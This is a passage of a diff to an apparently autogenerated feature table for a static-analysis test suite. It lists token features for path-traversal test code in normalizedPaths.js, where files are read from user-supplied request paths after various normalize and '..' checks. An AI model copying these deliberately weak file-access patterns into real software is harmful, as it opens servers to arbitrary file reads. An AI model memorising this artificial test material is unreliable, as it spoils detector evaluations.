req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:272:8:272:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:272:8:272:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:272:8:272:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:272:8:272:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:272:8:272:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | calleeImports | fs | @@ -9069,6 +76764,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:272:21:272:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:13 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:13 | newpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:13 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:13 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:13 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:26 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:26 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:26 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:26 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:26 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:36 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:36 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:36 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:36 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:36 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:275:28:275:36 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:275:28:275:36 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:275:28:275:36 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:275:28:275:36 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:275:28:275:36 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | calleeImports | path | @@ -9078,6 +76813,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:275:38:275:41 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativ ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativ ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativ ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativ ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativ ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:31 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:31 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:31 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:31 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:31 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:40 | pathModule.relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:40 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:40 | pathModule.relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:40 | pathModule.relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:40 | pathModule.relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | exceptional return of pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | exceptional return of pathMod ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | exceptional return of pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:33:276:40 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:33:276:40 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:33:276:40 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:33:276:40 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:33:276:40 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:51 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:51 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:51 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:51 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:51 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:61 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:61 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:61 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:61 | pathModule.normalize | enclosingFunctionName | 